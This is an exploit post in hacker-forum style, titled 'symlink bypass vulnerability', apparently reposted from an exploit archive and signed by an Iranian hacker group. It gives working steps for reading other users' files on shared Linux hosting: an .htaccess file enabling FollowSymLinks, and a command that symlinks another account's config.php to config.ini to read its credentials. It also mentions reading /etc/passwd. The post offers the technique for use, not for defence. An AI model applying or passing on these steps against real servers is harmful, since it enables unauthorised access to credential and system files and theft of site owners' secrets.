############################################# mail : ehsan.empire1@gmail.com #(+) Exploit Title: symlink bypass vulnerability #(+) Author : 3H34N #(+) E-mail : Ehsan.Empire@Att.Net #(+) Platform : Tested on: linux ############################################ symlink bypass with ini method when you symlink /etc/passwd and you can read it but symlink /home/user/public_html/config.php opposite with error : lscgid : execve() :/home/[patch]/public_html/ now you make a .htaccess file in current directory and copy this contain in it: then symlink with this command: ln -s /home/user/public_html/config.php config.ini you see bypassed error execve() :/home/[patch]/public_html/ and can you read config.ini ######################################################################## .htaccess file: Options Indexes FollowSymLinks DirectoryIndex ssssss.htm ######################################################################## (+)IRANIAN Young HackerZ # Persian Gulf (+)Black Hat Group Member : Net.Edit0r & DarkCoder & p3nt3st3r & H3x & 3H34N & D3adly #BHG (+)Sp My Best Friend : Net.Edit0r ^ BlackHat ~ Immortal Boy ~ Mr.Xhat~ Ashkan ..SkilleR.. ~ r3d.s3cur1ty ~ 4min ~ d3v1l.eyes ~ S3Ri0uS and all Friends (+)Gr33ts to : All Iranian HackerZ ########################################################################
[ShellCode] - Symlink bypass Vulnerability
Leader at J2TEAM. Website: https://j2team.dev/